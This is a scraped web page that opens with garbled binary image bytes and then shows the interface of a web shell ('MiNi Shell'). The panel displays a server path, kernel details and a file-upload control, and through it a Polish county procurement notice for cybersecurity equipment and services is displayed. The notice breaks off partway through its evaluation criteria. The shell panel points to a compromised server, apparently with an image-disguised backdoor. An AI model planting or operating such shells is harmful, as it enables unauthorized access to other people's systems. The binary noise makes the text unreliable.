JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240416/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20240416/0028619101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Podniesienie poziomu cyberbezpieczeństwa w Powiecie Kętrzyńskim </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIAT KĘTRZYŃSKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 510742451</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Grunwaldzki 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kętrzyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">11-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">izabela.dados@starostwo.ketrzyn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.starostwo.ketrzyn.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Centrum Usług Wspólnych Powiatu Kętrzyńskiego</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 362053243</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Pocztowa 13</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Kętrzyn</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">11-400</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">izabela.dados@starostwo.ketrzyn.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">https://cuw.starostwo.ketrzyn.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Podniesienie poziomu cyberbezpieczeństwa w Powiecie Kętrzyńskim </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-716f043e-e5e0-11ee-a01e-f641a8763d5f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00286191</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-04-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00007503/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Podniesienie poziomu cyberbezpieczeństwa w Powiecie Kętrzyńskim</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Fundusz Europejski na Rozwój Cyfrowy 2021-2027 (FERC), Priorytet II: Zaawansowane usługi cyfrowe Działanie 2.2. – Wzmocnienie krajowego systemu cyberbezpieczeństwa, konkurs w ramach Projektu grantowego „Cyberbezpieczny Samorząd” </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> Składanie wniosków o wyjaśnienie SWZ, oferty wraz z wymaganymi dokumentami oraz inna komunikacja pomiędzy Wykonawcą a Zamawiającym odbywa się za pośrednictwem platformy dostępnej pod adresem: https://platformazakupowa.pl/transakcja/898284 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/transakcja/898284</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">5. Zamawiający, zgodnie z rozporządzeniem w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie, określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformie zakupowej, tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>3) zainstalowana dowolna, inna przeglądarka internetowa niż Internet Explorer,<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6) Szyfrowanie na platformie zakupowej odbywa się za pomocą protokołu TLS 1.3.<br/>7) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>6. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>1) akceptuje warunki korzystania z platformy zakupowej określone w Regulaminie zamieszczonym na stronie internetowej pod linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>2) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem.<br/>7. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z platformy zakupowej, w szczególności za sytuację, gdy zamawiający zapozna się z treścią oferty przed upływem terminu składania ofert (np. złożenie oferty w zakładce „Wyślij wiadomość do zamawiającego”). Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i nie będzie brana pod uwagę w przedmiotowym postępowaniu, ponieważ nie został spełniony obowiązek narzucony w art. 221 Pzp.<br/>8. Zamawiający informuje, że instrukcje korzystania z platformy zakupowej dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu platformy zakupowej znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje<br/>9. W związku z tym, że formaty plików wykorzystywanych przez Wykonawców powinny być zgodne z rozporządzeniem w sprawie Krajowych Ram Interoperacyjności...:<br/>1) Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze szczególnym wskazaniem na .pdf<br/>2) W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: .zip .7Z<br/>3) Wśród formatów powszechnych a NIE występujących w rozporządzeniu występują: .rar .gif .bmp .numbers .pages. Dokumenty złożone w takich plikach zostaną uznane za złożone nieskutecznie.<br/>4) Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi max. 10 MB (łącznie z podpisem) oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi max. 5 MB (łącznie z podpisem).<br/>5) Ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu, zamawiający zaleca, w miarę możliwości, przekonwertowanie plików składających się na ofertę na format .pdf i opatrzenie ich podpisem kwalifikowanym PAdES.<br/>6) Pliki w innych formatach niż PDF zaleca się opatrzyć zewnętrznym podpisem XAdES. Wykonawca powinien pamiętać, aby plik z podpisem przekazywać łącznie z dokumentem podpisywanym.<br/>7) Zamawiający zaleca, aby w przypadku podpisywania pliku przez kilka osób, stosować podpisy tego samego rodzaju.....<br/>Numeracja ustępów zgodna z SWZ, pełny tekst w rozdz. X SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">2. Przetwarzanie pozyskanych danych osobowych przez Zamawiającego jest niezbędne dla celów wynikających z prawnie uzasadnionych interesów realizowanych przez Zamawiającego i wypełnienia obowiązku prawnego ciążącego na administratorze. W związku z tym, Wykonawca będzie obowiązany do złożenia oświadczenia o zapoznaniu się z klauzulą informacyjną zawartą w SWZ oraz w toku niniejszego postępowania do pisemnego poinformowania i uzyskania zgody każdej osoby, której dane osobowe będą podane w ofercie, oświadczeniach i dokumentach złożonych w postępowaniu. Na tę okoliczność Wykonawca złoży stosowne pisemne oświadczenie (jak we wzorze formularza oferty – zał. nr 1 do SWZ).<br/>3. Zgodnie z art. 13 ust. 1-2 RODO, informuję, że: <br/>1) administratorem udostępnionych w niniejszym postępowaniu danych osobowych jest Centrum Usług Wspólnych Powiatu Kętrzyńskiego, Plac Grunwaldzki 1 w Kętrzynie (11-400), reprezentowane przez Dyrektora - kontakt z Inspektorem Ochrony Danych: iod-cuw@starostwo-ketrzyn.pl lub na wyżej podany adres Administratora danych (z dopiskiem „Inspektor ochrony danych osobowych”);<br/>2) udostępnione w niniejszym postępowaniu:<br/>a)	dane osobowe przekazywane przez Wykonawcę i uzyskane w trakcie postępowania o udzielenie zamówienia publicznego, a w szczególności: dane osobowe ujawnione w ofertach i dokumentach i oświadczeniach dołączonych do oferty oraz dane osobowe ujawnione w dokumentach i oświadczeniach składanych na podstawie art. 274 Pzp ;<br/>b)	dane przedsiębiorców ujawniane w Centralnej Ewidencji i Informacji o Działalności Gospodarczej (CEIDG), które stanowią dane osobowe w rozumieniu RODO,<br/>- przetwarzane będą w celu związanym z postępowaniem o udzielenie zamówienia publicznego w sposób zautomatyzowany i nie będą podlegać profilowaniu.<br/>3) odbiorcami udostępnionych w niniejszym postępowaniu danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 Pzp; dane osobowe mogą zostać przekazane organom władzy publicznej oraz podmiotom wykonującym zadania publiczne lub działającym na zlecenie organów władzy publicznej, w zakresie i w celach, które wynikają z przepisów powszechnie obowiązującego prawa, a także innym podmiotom, które na podstawie stosownych umów podpisanych ze stroną wskazaną w ust. 2 pkt 1 lit b) przetwarzają dane osobowe, dla których Administratorem osoba wskazana w ust. 2 pkt 1 lit b); odbiorcami danych osobowych mogą być również podmioty współpracujące z Administratorem w wykonywaniu celów określonych w niniejszej klauzuli, w szczególności inne instytucje publiczne, takie jak: sądy, prokuratura, policja, itp.; <br/>4) dane osobowe będą przetwarzane przez okres prowadzenia postępowania o udzielenie zamówienia publicznego oraz realizacji umowy, a następnie będą przechowywane począwszy od dnia zakończenia okresu obowiązywania umowy przez okres co najmniej 4 lata (nie krócej jednak, niż okres przedawnienia roszczeń); dane osobowe po zrealizowaniu celu pierwotnego, dla którego zostały zebrane, o jakim była mowa wcześniej, będą przetwarzane dla celów archiwalnych przez okres zgodny z obowiązującymi u Zamawiającego przepisami archiwalnymi oraz przez okres niezbędny dla obrony przed roszczeniami kierowanymi wobec Zamawiającego, na podstawie powszechnie obowiązujących przepisów prawa, z uwzględnieniem okresów przedawnienia roszczeń określonych w powszechnie obowiązujących przepisach prawa;<br/>5) obowiązek podania danych osobowych bezpośrednio Wykonawcy lub/i osób wskazanych do realizacji zamówienia jest wymogiem ustawowym określonym w przepisach Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego ; konsekwencje niepodania określonych danych osobowych wynikają z ustawy Pzp;<br/>6) w odniesieniu do udostępnionych danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>7) udostępniający posiada prawo do:<br/>a)	art. 15 RODO - dostępu do danych...<br/>Numeracja ustępów zgodna z SWZ, pełny tekst w rozdz. IV SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">8) udostępniającemu nie przysługuje:<br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/>Numeracja ustępów zgodna z SWZ, pełny tekst w rozdz. IV SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">CUW.PK.343.11.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem obejmuje w szczególności:<br/>1) dostawę z wdrożeniem systemu do ochrony brzegu sieci klasy UTM, instruktażem z zakresu administracji i bieżącej obsługi dostarczonego systemu UTM;<br/>2) dostawę z wdrożeniem nowego klastra HCI wraz z systemem tworzenia kopii zapasowych, migracją wszystkich systemów z minimum 10 maszyn wirtualnych Zamawiającego na nowe systemy operacyjne, przeniesieniem bazy danych z SQL 2012 na nowy serwer bazodanowy oraz uruchomieniem wszystkich maszyn wirtualnych na nowym klastrze HCI;<br/>3) dostawę z wdrożeniem sieciowego serwera plikowego typu NAS na potrzeby tworzenia kopii zapasowych systemów z klastra HCI;<br/>4) przełączniki sieciowe do utworzenia sieci HCI oraz przełączniki sieciowe do utworzenia nowego rdzenia sieci LAN;<br/>5) dostawę z wdrożeniem systemu SIEM (Security Information and Event Management) z usługą zewnętrznego SOC - Centrum Operacji Bezpieczeństwa (Security Operations Center), systemu monitoringu środowiska;<br/>6) szkolenia z zakresu Cyberbezpieczeństwa dla informatyków (2 informatyków);<br/>7) szkolenia z zakresu Cyberbezpieczeństwa dla grup użytkowników (60 pracowników starostwa).<br/>2. Przedmiot zamówienia musi być fabrycznie nowy, wolny od wad konstrukcyjnych, materiałowych, wykonawczych i prawnych, nie może posiadać znamion użytkowania. Wykonawca wykona przedmiot zamówienia przy użyciu własnych narzędzi, materiałów, sprzętu i transportu. Przedmiot zamówienia musi być dostarczony, wdrożony i zainstalowany w całości w siedzibie Zamawiającego we wskazanym miejscu. Wszystkie dostarczane Produkty (rozumiane jako elementarny efekt działań/prac/dostaw objętych całym zakresem przedmiotu zamówienia wykonywanych przez Wykonawcę podczas realizacji Umowy w poszczególnych Etapach) oraz Komponenty (rozumiane jako integralna część dostawy i wdrożenia przedmiotu zamówienia, składające się przynajmniej z jednego Produktu lub wielu Produktów powiązanych ze sobą merytorycznie) podlegają usługom projektowania, dostaw, instalacji, konfiguracji i wdrożenia.<br/>3. Szczegółowe rozwiązania a w szczególności techniczne, technologiczne, materiałowe, organizacyjne, określa zał. nr 8 do SWZ - Opis przedmiotu zamówienia (OPZ).<br/>4. Szczegółowe informacje w szczególności dotyczące rozliczenia zamówienia zawiera projekt umowy, stanowiący zał. nr 7 do SWZ.<br/>5. Rozwiązania równoważne: <br/>Ilekroć w OPZ Zamawiający użył w opisie oznaczeń norm, aprobat, specyfikacji technicznych i systemów odniesienia, o których mowa w art. 101 ust. 1-3 ustawy PZP należy je rozumieć jako przykładowe. Zamawiający zgodnie z art. 101 ust. 4 ustawy Pzp dopuszcza rozwiązanie równoważne opisywanym w treści OPZ. Jeżeli zapisy zawarte w OPZ wskazywałyby w odniesieniu do rozwiązań, materiałów lub urządzeń znaki towarowe lub pochodzenie Zamawiający, zgodnie z art. 101 ust. 4 ustawy Pzp dopuszcza składanie ofert na rozwiązania równoważne. Wszelkie „produkty” pochodzące od konkretnych producentów określają minimalne parametry jakościowe i cechy użytkowe, jakim musi odpowiadać produkt, aby spełnić wymagania stawiane przez Zamawiającego, stanowią wyłącznie wzorzec jakościowy przedmiotu zamówienia. Poprzez zapis dotyczący minimalnych wymagań parametrów jakościowych Zamawiający rozumie wymagania materiałów, sprzętu i urządzeń zawarte w ogólnie dostępnych źródłach, katalogach, stronach internetowych producentów. Operowanie przykładowymi nazwami producenta ma jedynie na celu doprecyzowanie poziomu oczekiwań Zamawiającego w stosunku do określonego rozwiązania. Tak więc posługiwanie się nazwami producentów /produktów/ ma wyłącznie charakter przykładowy. Zamawiający, przy opisie przedmiotu zamówienia, wskazując oznaczenie konkretnego producenta (dostawcy) lub konkretny produkt, dopuszcza jednocześnie produkty równoważne o parametrach jakościowych i cechach użytkowych, co najmniej na poziomie parametrów wskazanego produktu, uznając tym samym każdy produkt o wskazanych parametrach lub lepszych. W takiej sytuacji Zamawiający wymaga złożenia stosownych dokumentów, wykazujących spełnienie przez produkty równoważne ww. parametrów i cech....<br/>8. Wykonawca przed złożeniem oferty ma obowiązek zapoznać się ze specyfikacją warunków zamówienia, projektem umowy, jak również uzyskać inne niezbędne informacje potrzebne dla sporządzenia oferty. Zakłada się, że Wykonawca uwzględnił w ofercie dane udostępnione przez Zamawiającego, w tym wyjaśnienia i modyfikacje SWZ. <br/>Numeracja ustępów zgodna z SWZ, pełen tekst w rozdz. VI SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">48000000-8 - Pakiety oprogramowania i systemy informatyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">32420000-3 - Urządzenia sieciowe</p> <p class="mb-0">48517000-5 - Pakiety oprogramowania informatycznego</p> <p class="mb-0">48730000-4 - Pakiety oprogramowania zabezpieczającego</p> <p class="mb-0">48800000-6 - Systemy i serwery informacyjne</p> <p class="mb-0">72000000-5 - Usługi informatyczne: konsultacyjne, opracowywania oprogramowania, internetowe i wsparcia</p> <p class="mb-0">72265000-0 - Usługi konfiguracji oprogramowania</p> <p class="mb-0">72263000-6 - Usługi wdrażania oprogramowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) CENA OFERTY - to cena brutto, zgodnie z ofertą przedstawioną przez Wykonawcę na formularzu stanowiącym zał. nr 1 do SWZ, określoną do dwóch miejsc po przecinku. Ocena ofert w kryterium ceny będzie ustalona wg wzoru: C= (Cmin*100 pkt/Co) x W,<br/>gdzie: C – ocena w kryterium „cena oferty”<br/>Cmin - „cena oferty” najniższa proponowana spośród wszystkich złożonych w postępowaniu ofert niepodlegających odrzuceniu <br/>Co - cena oferty ocenianej<br/>W – waga kryterium wyrażona w częściach dziesiętnych (60%=0,6)<br/>2) Gwarancja oraz wsparcie techniczne (system SIEM) - to okres wskazany przez Wykonawcę w formularzu oferty. Zamawiający żąda dostarczenia systemu SIEM z gwarancją oraz wsparciem technicznym na okres, który nie może być krótszy niż 12 miesięcy. Jeżeli Wykonawca zaproponuje okres 24 miesięcy – oferta w tym zakresie zostanie uznana za najkorzystniejszą i uzyska maksymalną ilość punktów. Wykonawcy w tym kryterium zostaną ocenieni w następujący sposób:<br/>Gwarancja oraz wsparcie techniczne (system SIEM) 12 miesięcy - 0,00 pkt x Waga (10%) = ocena 0,00 pkt, Gwarancja oraz wsparcie techniczne (system SIEM) 24 miesiące - 100,00 pkt x Waga (10%) = ocena 10,00 pkt.<br/>3) Długość SOC (Security Operations Center) - to okres wskazany przez Wykonawcę w formularzu oferty. Zamawiający żąda świadczenie usługi SOC (Security Operations Center) przez okres. który nie może być krótszy niż wska¬zany 12 miesięcy. Jeżeli Wykonawca zaproponuje okres 24 miesięcy – oferta w tym zakresie zostanie uznana za najkorzystniejszą i uzyska maksymalną ilość punktów. Wykonawcy w tym kryterium zostaną ocenieni w następujący sposób:<br/>Długość SOC (Security Operations Center) -12 miesięcy - 0,00 pkt x Waga (10%) = ocena 0,00 pkt, Długość SOC (Security Operations Center) - 24 miesiące - 100,00 pkt x Waga (10%) = ocena 10,00 pkt.<br/>4) 